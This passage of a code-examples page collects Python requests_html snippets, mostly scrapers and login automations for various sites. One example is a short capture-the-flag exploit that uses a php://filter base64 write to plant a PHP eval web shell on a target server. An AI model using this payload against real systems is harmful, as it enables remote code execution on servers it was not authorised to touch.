            '电容', '稳控', '变桨', '滑环', '打捆', '咨询', '测风', '电压',
            '电源', '电阻', '电梯', '模块', '网关', '数据', '驱动', '配件',
            '刹车', '升降', '防尘', '评估', '档案', '监控', '偏航', '标识',
            '土建', '振动', '仿真', '通讯', '液压', '雷电', '租赁', '端子',
            '紫铜', '蓄能', '加热', '控制', '接口', '导流', '变频', '工控',
            '继电器', '风速仪', '熔断器', '交换机', '集电环', '联轴器',
            '变压器', '变流器', '可行性', '启动', '滤网', '补偿', '二次',
            'GIS', 'SVG', '加密', '除湿', '寻甸', '元谋', '风向', '运输']  # 电机
        self.sel_title = 'tbody tr td a'
        self.sel_content = 'div.xq_nr'
        self.sel_pubdate = 'div.xiab_1 > span'
        self.session = HTMLSession()  # 获取session对象，可自动记录Cookies值
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) '
            'AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 '
            'Safari/537.36',
            'referer': 'https://www.chinabidding.cn/',
            }
        self.data = {}
        self.t = time.time()
        self.stamp = str(round(self.t * 1000))  # 获取毫秒级时间戳
        self.now = time.strftime('%Y-%m-%d', time.localtime(self.t))  # 获取当前日

    def get_response(self, url):
        r = self.session.get(url, params=self.data, headers=self.headers)
        return r

    def chk_login(self):
        response = self.get_response(self.loginurl)  # 获取登录页面的验证码
        userid = response.html.find('div.deng_nr_1 > input',
                                    first=True).attrs['value']
        self.data = {
            't': self.stamp,
            'randomID': userid
        }
        yzmpic = self.get_response(self.yzmurl)  # 获取验证码图片并保存
        f = open('captcha.jpg', 'wb')
        f.write(yzmpic.content)
        f.close()

        os.system('start captcha.jpg')  # 显示验证码图片
        yzm = input('输入验证码：')
        logindata = {
            'name': '联合动力',
            'password': '******',
            'url': '',
            'yzm': yzm,
            'randomID': userid,
        }
        rep = self.session.post(self.loginchkurl, data=logindata,
                                headers=self.headers)
        # print(rep, rep.text)
        # response = self.session.post(self.loginurl, data=logindata,
        #                              headers=self.headers)
        # print(response.text)  # 登录成功自动跳转到首页
        if rep.text == '5':
            print('登录失败')
            return False
        else:
            print('登录成功')
            return True

    def get_result(self):
        start = time.time()
        if self.chk_login():  # 获取验证码、下载、输入并登录
            for i in range(1, self.page):
                searchurl = self.url + '/search/searchgj/zbcg'
                self.data = {
                    'areaid': '',
                    'keywords': '风电',
                    'time_start': self.now,
                    'time_end': self.now,
                    'page': i,
                    'search_type': 'CONTEXT',
                    'categoryid': '',
                    'rp': '30',
                    'table_type': '',
                    'b_date': 'week',
                }
                response = self.get_response(searchurl)
                item_list = response.html.find(self.sel_title)
                # print(item_list)
                for item in item_list:
                    try:
                        href = self.url + item.attrs['href']
                        title = item.attrs['title']
                    except Exception:
                        continue
                    # title = item.text
                    # print(title)
                    if self.chk_title(title):  # 筛选标题去除相关条目
                        if self.key_title1 in title or self.key_title2 \
                           in title:
                            response = self.get_response(href)
                            try:
                                content = response.html.find(
                                    self.sel_content, first=True).text
                                pubdate = response.html.find(
                                    self.sel_pubdate, first=True).text
                            except Exception:
                                continue
                            # print(content)
                            if self.key_content in content:
                                webbrowser.open(href)
                                print(href, pubdate, title)
                time.sleep(1)
        end = time.time() - start
        print('耗时：%.2f秒' % end)
        print(time.strftime("%H:%M:%S"))  # 当前时间

    def chk_title(self, title):
        for word in self.exp_list:
            if word in title:
                # print(word)
                return False
        # print(title)
        return True

Exemplo n.º 14

0

Exibir arquivo

Arquivo: piazza_scraper.py Projeto: matthewbayer/CS4701-Project

Attempt at web scraping Piazza
This does not work, because Piazza uses Javascript to retrieve post data
"""

# session = requests.Session()
# s = session.post("https://piazza.com/class", data=userdata.data, cookies=userdata.cookies)

# url = "https://piazza.com/class/kea8ntdsn097ev?cid=1494"
# s = session.get(url)
# soup = BeautifulSoup(s.content, "html.parser")
# print(soup.get_text())

session = HTMLSession()

r = session.get("https://piazza.com/")
r = session.post("https://piazza.com/class", data=userdata.data)
page = session.get("https://piazza.com/class/kea8ntdsn097ev?cid=1")
page.html.render()
soup = BeautifulSoup(page.html, "html.parser")
print(soup.get_text())

# data = '{"method":"content.get","params":{"cid":"khksgq944s2172","nid":"kek9zeb4r1g3ir","student_view":false}}'
# r = session.post('https://piazza.com/logic/api', data=userdata.data)
# soup = BeautifulSoup(r.html, "html.parser")
# print(soup.get_text())

# r = session.get("https://piazza.com/class/kea8ntdsn097ev?cid=1494")

# soup = BeautifulSoup(r.html.text, "html.parser")

# url = "https://piazza.com/class/kea8ntdsn097ev?cid=1"

Exemplo n.º 15

0

Exibir arquivo

payload = {
    "staff_username": USER,
    "staff_password": PASSWORD,
}

headers = {
    "User-Agent":
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0"
}

# 0) GET - login - https://www.campingshop.pl/panel/auth/login
r = sess.get(LOGIN_WEBSITE, headers=headers
             )  #  LOGIN_WEBSITE: http://www.campingshop.pl/panel/auth/login

# 1) POST - login - https://www.campingshop.pl/panel/auth/login z staff_username i staff_password
r = sess.post(LOGIN_WEBSITE, data=payload, headers=headers)
r.html.render(
)  # tu chciałam przekazać send_cookies_session=True ale dostaję TypeError: render() got an unexpected keyword argument 'send_cookies_session'
# mimo, ze 'send_cookies_session' jest w doc'sach https://requests.readthedocs.io/projects/requests-html/en/latest/
print(r.cookies.get_dict())  # brak ciasteczek ;(

# 2) GET - panel - na https://www.campingshop.pl/panel
r = sess.get("https://www.campingshop.pl/panel", headers=headers)

# 3) GET - login - na https://www.campingshop.pl/panel2/login
r = sess.get("https://www.campingshop.pl/panel2/login", headers=headers)

r.html.render()
print(r.cookies.get_dict())  # brak ciasteczek ;(

# Do uzupełnienia

Exemplo n.º 16

0

Exibir arquivo

Arquivo: scraper.py Projeto: vovaekb/mpsv_vacancies_scraper

    def search(self) -> list:
        """
        Performs actual scraping

        :return: list with resulting positions
        """

        post_data = {
            "_piref37_267288_37_267287_267287.next_page": "/vmsearch.do",
            "_piref37_267288_37_267287_267287.formtype": 3,
            "_piref37_267288_37_267287_267287.vmid": "",
            "_piref37_267288_37_267287_267287.nprokoho": "",
            "_piref37_267288_37_267287_267287.ndny": "",
            "_piref37_267288_37_267287_267287.nokres": "",
            "_piref37_267288_37_267287_267287.nsort": "",
            "_piref37_267288_37_267287_267287.ref": [],
            "_piref37_267288_37_267287_267287.kiosek": 0,
            "_piref37_267288_37_267287_267287.send": 'A',
            "_piref37_267288_37_267287_267287.ok": "Search",
            "_piref37_267288_37_267287_267287.profese": [self.profession], # 'developer'
            "_piref37_267288_37_267287_267287.obor": "",
            "_piref37_267288_37_267287_267287.dopravaObec": "",
            "_piref37_267288_37_267287_267287.firma": "",
            "_piref37_267288_37_267287_267287.ico": "",
            "_piref37_267288_37_267287_267287.okres": self.district_code,
            "_piref37_267288_37_267287_267287.zaDny": "",
            "_piref37_267288_37_267287_267287.mzdaOd": "",
            "_piref37_267288_37_267287_267287.typMzdy": 'M',
            "_piref37_267288_37_267287_267287.sort": 2
        }

        cleanr = re.compile(r'<.*?>')

        session = HTMLSession()
        response = session.post(self.url, data=post_data)
        tree = html.fromstring(response.text)
        position_elements = tree.cssselect('table.OKtbodyThDistinct tbody')
        for position_element in position_elements:
            # get details from lines using regex match
            position = {}
            occupation = position_element.cssselect('h4.vmProfese')[0].text
            position['occupation'] = occupation

            info_lines = position_element.cssselect('tr')

            for info_line in info_lines:
                if('Company' in str(html.tostring(info_line))):
                    company_list = info_line.cssselect('b')
                    company = ''
                    if (len(company_list)):
                        company = company_list[0].text
                        position['company'] = company
                elif('Report to' in str(html.tostring(info_line))):
                    reportto_element = info_line.cssselect('td')[2]
                    reportto_str = str(html.tostring(reportto_element, encoding='unicode'))
                    report_to = re.sub(cleanr, '', reportto_str)
                    position['report_to'] = report_to
                elif('Comment on vacancy:' in str(html.tostring(info_line))):
                    description_element = info_line.cssselect('td')[0]
                    description_str = str(html.tostring(description_element, encoding='unicode'))
                    description = re.sub(cleanr, '', description_str)
                    position['description'] = description

            # print(f'company: {company}')
            # print(company.text)
            self.positions.append(position)

        # print(self.positions)
        return self.positions

Exemplo n.º 17

0

Exibir arquivo

Arquivo: cervezas.py Projeto: miguelbernal/lucas_ejercicios_py

from requests_html import HTMLSession
import json

session = HTMLSession()
r = session.get("https://cervezapedia.com/beer/rate")
token = r.cookies["XSRF-TOKEN"]
print(token)
r = session.post("https://cervezapedia.com/beer/rate",
                 headers={"X-XSRF-TOKEN": token})

datos = json.loads(r.content)

#print(datos)

for cerveza in datos["data"]:
    print("-------------------------------------------------------")
    print("Código:", cerveza['externalId'], "Nombre:", cerveza['name'])

    r = session.post("https://cervezapedia.com/beer/byId",
                     headers={"X-XSRF-TOKEN": token},
                     json={"id": cerveza['externalId']})
    datos_cerveza = json.loads(r.content)["data"]
    #print(datos_cerveza)
    print("Pais: ", datos_cerveza["countrySpanishName"])
    print("Alcohol: ", datos_cerveza["alcohol"])
    print("Estilo: ", datos_cerveza["styleName"])

Exemplo n.º 18

0

Exibir arquivo

Arquivo: check_pages.py Projeto: rek655689/vkbotKPV

def check_pages(vk, config):
    # авторизация
    url = 'https://catwar.su/ajax/login'
    user_agent_val = 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ' \
                     'Chrome/90.0.4430.93 Safari/537.36 '
    session = HTMLSession()
    session.headers.update({'Referer': url})
    session.headers.update({'User-Agent': user_agent_val})
    session.post(url, {**catwar})

    heads = ('врачеватель', 'врачевательница', 'ученик врачевателя', 'ученица врачевателя', 'советник', 'советница')
    elders = ('старейшина')
    elects = ('избранник духов', 'избранница духов')
    guards = ('страж', 'стражница')
    hunters = ('охотник', 'охотница')
    futures = ('будущий охотник', 'будущая охотница', 'будущий страж', 'будущая стражница')
    others = ('котёнок', 'переходящий', 'переходящая')
    page_ids = {heads: 56490990, elders: 56591896, elects: 56846221,  guards: 56807806,
                hunters: 56807807, futures: 56490171, others: 56808867}
    wrong_names, dels, not_position = [], [], []
    m_1, m_2, m_3 = '', '', ''

    for key, value in page_ids.items():
        # получаем данные со страницы
        orig_page = vk_token.pages.get(**config, owner_id=-group_id, page_id=value, need_source=1)
        orig_page = orig_page['source']
        page = orig_page[(orig_page.find("{|") + 2):(orig_page.find("|}"))]

        vk_ids = re.findall("id[0-9]+", page)
        i = 0
        while i < len(vk_ids):
            vk_ids[i] = vk_ids[i][2:]
            i += 1

        vk_names = re.findall("\|[^ -][^0-9\]\]\[]+", page)
        i = 0
        while i < len(vk_names):
            vk_names[i] = vk_names[i][1:]
            i += 1

        vk_dict = dict(zip(vk_ids, vk_names))

        ids = re.findall("\|[0-9]+", page)
        i = 0
        while i < len(ids):
            ids[i] = ids[i][1:]
            i += 1

        names = re.findall("\[[А-яё ]+", page)
        i = 0
        while i < len(names):
            names[i] = names[i][1:]
            i += 1

        # проверка вкшных имён
        for vk_key, vk_value in vk_dict.items():
            vk_name = vk.users.get(user_ids=vk_key, fields='first_name, last_name')[0]
            vk_name = vk_name['first_name'] + ' ' + vk_name['last_name']
            if vk_value != vk_name:
                wrong_names.append(f'{vk_value} — {vk_name}')

        # проверка на нахождение в клане и должности
        for id in ids:
            response = session.get(f'https://catwar.su/cat{id}')
            profile = response.content.decode("utf-8")
            soup = BeautifulSoup(profile, 'html.parser')
            position = soup.find('i')
            if not position:
                if id != 539719 or id != 1068731:
                    dels.append(f'{key[0]} — {id}')
            else:
                position = position.text
                position = re.match('[^i<>/]+', position).group()
                if position.lower() not in key:
                    not_position.append(f'{id} не {key[0]}, a {position}')

    for x in dels:
        m_1 = m_1 + x + '\n'
    for x in not_position:
        m_2 = m_2 + x + '\n'
    for x in wrong_names:
        m_3 = m_3 + x + '\n'

    vk.messages.send(**config, random_id=get_random_id(), user_id=editor,
                     message=f'Удалены или не в клане: {m_1}\n\n'
                     )
    vk.messages.send(**config, random_id=get_random_id(), user_id=editor,
                     message=f'Другие должности: {m_2}\n\n'
                     )
    vk.messages.send(**config, random_id=get_random_id(), user_id=editor,
                     message=f'Другие имена: {m_3}\n\n',
                     )

Exemplo n.º 19

0

Exibir arquivo

# https://cyc1e183.github.io/2020/04/03/%E5%85%B3%E4%BA%8Efile_put_contents%E7%9A%84%E4%B8%80%E4%BA%9B%E5%B0%8F%E6%B5%8B%E8%AF%95/
import pprint
from requests_html import HTMLSession

url = 'http://www.cduestc.cn:50007/'
params = {"file": 'php://filter/write=convert.base%364-decode/resource=aa.php'}
data = {
    # <?php @eval($_POST['cmd']) ?> 写到aa.php
    # <?php exit(); 前面加1个a
    # <?php die(); 前面加2个aa
    'contents': 'aaPD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSkgPz4='
}
# proxies = {'http': 'http://localhost:8080'}
proxies = {}

s = HTMLSession()
res = s.post(url, params=params, data=data, proxies=proxies)
pprint.pprint(res.text)

Exemplo n.º 20

0

Exibir arquivo

Arquivo: parser.py Projeto: AlexeyRadchenko/LostFilmBot

class LostFilmParser:
    source_url = 'https://www.lostfilm.tv/'
    tv_shows_list_part_url = 'https://www.lostfilm.tv/ajaxik.php'
    part_step = 10

    def __init__(self):
        self.session = HTMLSession()
        self.news_data = self.session.get(self.source_url)

    def get_links(self):
        return self.news_data.html.links

    def get_title_en(self, href):
        try:
            result = search(r'/series/([^/]+)/', href)
            title_en = result.group(1)
            tv_show_link = self.source_url.rstrip('/') + result.group()
        except AttributeError:
            title_en = None
            tv_show_link = None
        return title_en, tv_show_link

    def get_new_shows_episodes(self):
        clear_data = []
        news_block = self.news_data.html.find('.new-movies-block', first=True)
        movies = news_block.find('a.new-movie')
        for movie in movies:
            title_en, show_link = self.get_title_en(movie.attrs['href'])
            clear_data.append(
                {
                    'title_ru': movie.attrs['title'],
                    'title_en': title_en,
                    'jpg': 'http:' + movie.find('img', first=True).attrs['src'],
                    'season': movie.find('.title', first=True).text,
                    'date': movie.find('.date', first=True).text,
                    'episode_link': self.source_url.rstrip('/') + movie.attrs['href'],
                    'tv_show_link': show_link,
                }
            )
        return clear_data

    def load_part_list(self, step):
        url = self.source_url + 'ajaxik.php'
        request_data = self.session.post(
            url=url,
            data={'act': 'serial', 'o': step, 's': 3, 't': 0, 'type': 'search'}
            )
        return json.loads(request_data.content)['data']

    def get_tv_shows_list(self):
        """10->20->30-> пока не вернет пустой список"""
        step = 0
        shows_list = []
        request_result = self.load_part_list(step)
        while request_result:
            for result in request_result:
                shows_list.append(result)
            step += self.part_step
            sleep(1)
            request_result = self.load_part_list(step)
        return shows_list

Exemplo n.º 21

0

Exibir arquivo

class Grabber:
    def __init__(self, d, f, t, p):
        self.date = d
        self.from_ = f
        self.to = t
        self.purpose_code = p
        self.s = HTMLSession()
        self.s.cookies = self.init_cookie()
        self.uuid = ''
        self.ticket = {}

    def init_cookie(self):
        cookie_jar = RequestsCookieJar()
        cookie_jar.set("route", "c5c62a339e7744272a54643b3be5bf64", domain="/")
        cookie_jar.set("JSESSIONID",
                       "772931B953A48C762D39F27832447D2F",
                       domain="/otn")
        cookie_jar.set("BIGipServerotn", "217055754.38945.0000", domain="/")
        return cookie_jar

    def check_tickect_info(self):
        def crawl_ticket_info():
            url = (
                f'https://kyfw.12306.cn/otn/leftTicket/queryZ?'
                f'leftTicketDTO.train_date={self.date}'
                f'&leftTicketDTO.from_station={self.from_}'
                f'&leftTicketDTO.to_station={self.to}&purpose_codes={self.purpose_code}'
            )
            r = self.s.get(url)
            tickets = []
            for line in r.json()['data']['result']:
                ls = line.split('|')
                if ls[0]:
                    tickets.append({
                        'secretstr': ls[0],
                        'train_num': ls[3],
                        'train_date': ls[13],
                        'start_at': ls[8],
                        'arrive_at': ls[9],
                        'seat_level_0': ls[32],
                        'seat_level_1': ls[31],
                        'seat_level_2': ls[30],
                        'sleeper_level_0': ls[21],
                        'sleeper_level_1': ls[23],
                        'motor_sleeper': ls[33],
                        'sleeper_level_2': ls[28],
                        'soft_seat': ls[27],
                        'hard_seat': ls[29],
                        'no_seat': ls[26]
                    })
            return tickets

        tickets = crawl_ticket_info()
        if not tickets:
            return
        for ticket in tickets:
            if ticket['train_num'] == 'G1002':
                self.order_ticket(ticket)
                return

    def submit_order_request(self, ticket):
        url = 'https://kyfw.12306.cn/otn/leftTicket/submitOrderRequest'
        data = {
            'secretStr':
            urllib.parse.unquote(ticket['secretstr']),
            'train_date':
            dt.datetime.strptime(ticket['train_date'],
                                 '%Y%m%d').strftime('%Y-%m-%d'),
            'back_train_date':
            dt.datetime.today().strftime('%Y-%m-%d'),
            'tour_flag':
            'dc',
            'purpose_codes':
            self.purpose_code,
            'query_from_station_name':
            sd[self.from_],
            'query_to_station_name':
            sd[self.to],
            'undefined':
            ''
        }
        r = self.s.post(url, data=data)

    def get_data(self):
        def parse_pts(html):
            tds = html.xpath('//tbody[@id="check_ticketInfo_id"]/tr/td')
            return f'0,0,1,{tds[3].text},1,{tds[5].text},{tds[6].text},N', f'{tds[3].text},1,{tds[5].text},1_'

        url = 'https://kyfw.12306.cn/otn/confirmPassenger/initDc'
        headers = {
            'Referer':
            'https://kyfw.12306.cn/otn/leftTicket/init?linktypeid=dc',
            'Host': 'kyfw.12306.cn',
            'Origin': 'https://kyfw.12306.cn',
            'User-Agent':
            'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded'
        }
        r = self.s.post(url, data={'_json_att': ''}, headers=headers)
        r.html.render(timeout=6, wait=6)
        # print(r.text)
        # TODO: optimized
        print(r.text)
        html = lxml.etree.HTML(r.text)
        passenger_ticket_str, old_passenger_str = parse_pts(html)

        return {
            'REPEAT_SUBMIT_TOKEN':
            re.findall(r'var globalRepeatSubmitToken = \'(.*)\';', rt)[0],
            'key_check_isChange':
            re.findall(r'\'key_check_isChange\':\'(.*)\',', rt)[0],
            'leftTicketStr':
            re.findall(r'\'leftTicketStr\':\'(.*)\',', rt)[0],
            '_json_att':
            '',
            'dwAll':
            'N',
            'roomType':
            '00',
            'whatsSelect':
            '1',
            'seatDetailType':
            '000',
            'choose_seats':
            '',  # TODO: choose seat.
            'train_location':
            'QX',  # cant understand.
            'purpose_codes':
            '00',
            'randCode':
            '',
            'passengerTicketStr':
            passenger_ticket_str,
            'oldPassengerStr':
            old_passenger_str,
        }

    def order_ticket(self, ticket):
        self.submit_order_request(ticket)
        # checkuser
        data = self.get_data()
        url = 'https://kyfw.12306.cn/otn/confirmPassenger/confirmSingleForQueue'
        r = self.s.post(url, data=data)
        try:
            if r.status_code == 200:
                print('got !')
        except:
            import traceback
            traceback.print_exc()

    def show_qr_code(self):
        """Show qrcode for login."""
        url = 'https://kyfw.12306.cn/otn/resources/login.html'
        self.s.get(url)
        rjs = self.s.post('https://kyfw.12306.cn/passport/web/create-qr64',
                          data={
                              'appid': 'otn'
                          }).json()
        self.uuid = rjs['uuid']
        b64img = rjs['image']
        img = Image.open(BytesIO(base64.b64decode(b64img)))
        img.show()

    def check_qr_code(self):
        rjs = self.s.post('https://kyfw.12306.cn/passport/web/checkqr',
                          data={
                              'appid': 'otn',
                              'uuid': self.uuid
                          }).json()
        return rjs['result_code'] != '2'

    def login(self):
        threading.Thread(target=self.show_qr_code).start()
        while self.check_qr_code():
            time.sleep(2)
        print('login success.')

Exemplo n.º 22

0

Exibir arquivo

Arquivo: scrapper.py Projeto: Felipeandradee/INMET-API-REST

class ScrapperINMET:
    def __init__(self):

        env_path = os.path.join(os.path.dirname(__file__), '..', 'env.ini')
        env_config = configparser.ConfigParser()
        env_config.read(env_path)
        self.user = env_config.get('login', 'user')
        self.password = env_config.get('login', 'password')

        self.base_url = "http://www.inmet.gov.br"
        self.session = HTMLSession(mock_browser=True)

    @staticmethod
    def is_logged_in(response: Response) -> bool:
        return 'Modulo de Estudo e Pesquisa' in response.text

    def login(self) -> bool:
        url = '/'.join([self.base_url, "projetos/rede/pesquisa/inicio.php"])
        self.session.get(url)

        payload = {
            'mUsuario': '',
            'mSenha': self.password,
            'mCod': self.user,
            'mGerModulo': 'PES',
            'btnProcesso': ' Acessar '
        }

        response = self.session.post(url, data=payload)
        response.raise_for_status()
        return self.is_logged_in(response)

    def get_dados(self, tipo_periodo: str, uf: str, cidade: str,
                  dtInicio: datetime.datetime, dtFim: datetime.datetime):

        self.login()

        if tipo_periodo == 'mes':
            url = '/'.join([
                self.base_url, "projetos/rede/pesquisa/form_mapas_mensal.php"
            ])
            url_post = '/'.join(
                [self.base_url, "projetos/rede/pesquisa/mapas_mensal_sem.php"])

        elif tipo_periodo == 'dia':
            url = '/'.join([
                self.base_url, "projetos/rede/pesquisa/form_mapas_c_diario.php"
            ])
            url_post = '/'.join(
                [self.base_url, "projetos/rede/pesquisa/mapas_c_diario.php"])
        else:
            raise NotImplementedError

        self.session.get(url)

        payload = {
            'mUsuario': self.user,
            'mRelRegiao': '',
            'mRelEstado': uf.upper(),
            'mRelDtInicio': dtInicio.strftime('%d/%m/%Y'),
            'mRelDtFim': dtFim.strftime('%d/%m/%Y'),
            'mGerModulo': 'PES',
            'mOpcaoAtrib15': '1',
            'btnProcesso': ' Pesquisa '
        }

        response = self.session.post(url_post, data=payload)
        pattern = cidade + '.*href=([^\>]+) target'
        url_result = re.search(pattern, response.text,
                               flags=re.IGNORECASE).group(1)
        response = self.session.get(url_result)
        rtext = response.html.xpath('.//pre')[0].full_text
        dados = re.search('(estacao;.+)', rtext,
                          re.IGNORECASE | re.DOTALL).group(1)

        dados = dados.split('\n')
        head = dados[0].split(';')
        dados.pop(0)
        result = list()
        for dado in dados:
            values = dado.split(';')
            if len(values) != len(head):
                continue
            temp = dict()
            for k, v in zip(head, values):
                if k + v == "":
                    continue
                temp[k] = v
            result.append(temp)
        return result

Exemplo n.º 23

0

Exibir arquivo

Arquivo: gratisdns.py Projeto: laudrup/python-gratisdns

class GratisDNS(object):
    BACKEND_URL = 'https://admin.gratisdns.com/'
    SUPPORTED_RECORDS = ('A', 'AAAA', 'CNAME', 'MX', 'TXT', 'SRV')

    def __init__(self, username: str, password: str):
        self.__session = HTMLSession()

        payload = {
            'action': 'logmein',
            'login': username,
            'password': password
        }
        response = self.__session.post(GratisDNS.BACKEND_URL,
                                       data=payload,
                                       allow_redirects=False)

        if response.status_code != requests.codes.found:
            # Unfortunately, GratisDNS doesn't user proper HTTP status
            # codes, but does use a redirect on successfull login, so
            # assume anything else is an error.
            raise GratisDNSError(
                'Login response was not redirect. Possibly invalid username/password'
            )

    def __get_domains(self, action: str, table_id: str) -> list:
        domains = []
        response = self.__session.get(GratisDNS.BACKEND_URL,
                                      params={'action': action})
        table = response.html.find(table_id, first=True)
        for domain in table.find('tr'):
            domain_change_link = domain.find('a',
                                             containing='Ændre',
                                             first=True)
            if domain_change_link:
                href = domain_change_link.attrs['href']
                query = parse_qs(urlparse(href).query)
                domains.append(query['user_domain'][0])
        return domains

    def __record_from_dict(self, record_type: str,
                           record_entries: dict) -> Record:
        if record_type == 'A':
            return ARecord(record_entries.get('user_domain'),
                           record_entries['Hostname'],
                           record_entries['IPv4'],
                           id=record_entries.get('id'),
                           ttl=record_entries['TTL'])

        elif record_type == 'AAAA':
            return AAAARecord(record_entries.get('user_domain'),
                              record_entries['Hostname'],
                              record_entries['IPv6'],
                              id=record_entries.get('id'),
                              ttl=record_entries['TTL'])

        elif record_type == 'CNAME':
            raise NotImplementedError()

        elif record_type == 'MX':
            return MXRecord(record_entries.get('user_domain'),
                            record_entries['Hostname'],
                            record_entries['Exchanger'],
                            record_entries['Preference'],
                            id=record_entries.get('id'),
                            ttl=record_entries['TTL'])

        elif record_type == 'TXT':
            return TXTRecord(record_entries.get('user_domain'),
                             record_entries['Hostname'],
                             record_entries['Text'],
                             id=record_entries.get('id'),
                             ttl=record_entries['TTL'])

        elif record_type == 'SRV':
            raise NotImplementedError()

        raise NotImplementedError()

    def __record_change_query_from_column(self, column) -> dict:
        record_change_link = column.find('a', containing='Ændre', first=True)
        if record_change_link:
            href = record_change_link.attrs['href']
            query = parse_qs(urlparse(href).query)
            return {k: v[0] for k, v in query.items()}
        return {}

    def __get_records(self, html: HTML) -> dict:
        records = {}
        for entry in html.find('.dns-records'):
            record_type = entry.find('h2', first=True).element.text.strip()
            if record_type not in self.SUPPORTED_RECORDS:
                continue
            table = entry.find('table', first=True)
            headers = [
                h.text for h in table.find('thead', first=True).find(
                    'tr', first=True).find('th')
            ]
            record_entries = []
            for row in table.find('tbody', first=True).find('tr'):
                cols = row.find('td')
                entry = {}
                for i, h in enumerate(headers):
                    column = cols[i]
                    if h:
                        entry[h] = column.text
                    else:
                        record_change_link_query = self.__record_change_query_from_column(
                            column)
                        if record_change_link_query:
                            entry['id'] = record_change_link_query['id']
                            entry['user_domain'] = record_change_link_query[
                                'user_domain']
                if entry:
                    record_entries.append(
                        self.__record_from_dict(record_type, entry))
            if record_entries:
                records[record_type] = record_entries
        return records

    def create_record(self,
                      domain,
                      host,
                      type,
                      data,
                      preference=None,
                      weight=None,
                      port=None):
        raise NotImplementedError()

    def update_record(self, record: Record):
        if record.record_type not in self.SUPPORTED_RECORDS:
            raise NotImplementedError()

        form_data = vars(record)
        form_data[
            'action'] = f'dns_primary_record_update_{record.record_type.lower()}'
        self.__session.post(GratisDNS.BACKEND_URL, data=form_data)

    def delete_record(self, domain, host, type=None, preference=None):
        raise NotImplementedError()

    def get_primary_domains(self):
        return self.__get_domains('dns_primarydns', '#primarydnslist')

    def get_secondary_domains(self):
        return self.__get_domains('dns_secondarydns', '#secondarydnslist')

    def get_primary_domain_details(self, domain: str):
        response = self.__session.get(GratisDNS.BACKEND_URL,
                                      params={
                                          'action':
                                          'dns_primary_changeDNSsetup',
                                          'user_domain': domain
                                      })
        return self.__get_records(response.html)

    def create_primary_domain(self, domain):
        raise NotImplementedError()

    def create_secondary_domain(self, domain, master, slave='xxx.xxx.xxx.xxx'):
        raise NotImplementedError()

    def delete_primary_domain(self, domain):
        raise NotImplementedError()

    def delete_secondary_domain(self, domain):
        raise NotImplementedError()

    def import_from_axfr(self, domain, slave='127.0.0.1'):
        raise NotImplementedError()

Exemplo n.º 24

0

Exibir arquivo

Arquivo: script.py Projeto: ArchitG358/auto_formExtractFill-scraper

def start(data):
    session = HTMLSession()
    url = "https://parivahan.gov.in/rcdlstatus/?pur_cd=101"
    res = session.get(url)

    # ----------------FORM EXTRACTION----------------

    soup = BeautifulSoup(res.html.html, "html.parser")
    details = {}

    form = soup.find_all("form")[0]
    action = form.attrs.get("action").lower()
    method = form.attrs.get("method", "get").lower()
    inputs = []

    for input_tag in form.find_all("input"):
        input_type = input_tag.attrs.get("type", "text")
        input_name = input_tag.attrs.get("name")
        input_value = input_tag.attrs.get("value", "")
        inputs.append({
            "type": input_type,
            "name": input_name,
            "value": input_value
        })

    details["action"] = action
    details["method"] = method
    details["inputs"] = inputs

    # -------------------Captcha---------------------
    captcha_src = soup.find_all("img")
    for i in captcha_src:
        if "Captcha" in i['src']:
            captcha_url = "https://parivahan.gov.in/" + i['src']

    print(captcha_url
          )  # Currently Captcha is taking by user input by visiting the link
    # -------------------FORM FILLING-----------------

    data['form_rcdl:j_idt32:CaptchaID'] = input("Enter Captcha: ")

    submit_url = urljoin(url, details["action"])
    #print(submit_url)

    if details["method"] == "post":
        res = session.post(submit_url, data=data)
        # return res
    elif details["method"] == "get":
        res = session.get(submit_url, params=data)
        # return res

    # ----------Authorization-----------

    auth_cookie = res.cookies

    # ---------Data Extract-------------

    name_xpath = '//*[@id="form_rcdl:j_idt115"]/table[1]/tbody/tr[2]/td[2]'
    issue_xpath = '//*[@id="form_rcdl:j_idt115"]/table[2]/tbody/tr[1]/td[2]/text()'
    expiry_xpath = '//*[@id="form_rcdl:j_idt115"]/table[2]/tbody/tr[1]/td[3]/text()'
    vehicle_class_xpath = '//*[@id="form_rcdl:j_idt164_data"]/tr/td[2]'
    driving_num_xpath = '//*[@id="form_rcdl:j_idt115"]/table[1]/tbody/tr[5]/td[2]'

    url = 'https://parivahan.gov.in/rcdlstatus/vahan/rcDlHome.xhtml'
    response = requests.get(url, cookies=auth_cookie)
    byte_data = response.content
    source_code = html.fromstring(byte_data)

    # --------------CSV DUMP----------------------
    final_data = [
        ["Name"],
        ["Issue Date"],
        ["Expiry Date"],
        ["Vehicle Class"],
    ]

    name_list = source_code.xpath(name_xpath)
    issue_list = source_code.xpath(issue_xpath)
    expiry_list = source_code.xpath(expiry_xpath)
    class_list = source_code.xpath(vehicle_class_xpath)
    driv_num = source_code.xpath(driving_num_xpath)

    # print(tree[0].text_content())

    for i in range(len(name_list)):
        final_data[0].append(name_list[i].text_content())
        final_data[1].append(issue_list[i].text_content())
        final_data[2].append(expiry_list[i].text_content())
        final_data[3].append(class_list[i].text_content())
        final_data[4].append(driv_num[i].text_content())

    output_df = pd.DataFrame(final_data)
    output_df.to_csv("output.csv", index=True)

Exemplo n.º 25

0

Exibir arquivo

Arquivo: image_pull.py Projeto: idenc/Manga-Downloader

    def download_manga(self, start_link, end_link=""):
        """given a start link and end link from twistedhelscans.com, downloads all manga images"""
        next_link = start_link
        counter = 1

        # Deal with end link being first page
        if end_link.endswith('1'):
            end_link = end_link[:-6]

        # Initial page
        session = HTMLSession()
        page = session.post(start_link, data=dict(adult="true"))

        # get title of manga
        try:
            title = gen_title(page)
        except:
            self.queue.put(
                "Could not find title. Website is not Twisted Hel Scan page?")
            return

        while next_link != end_link:
            # Open next page
            page = session.post(next_link, data=dict(adult="true"))

            # check if end link is first page redirect
            if page.url == end_link:
                break

            self.queue.put(page.url)

            if not end_link:
                end_link = page.html.find('h1.hb.dnone', first=True).find(
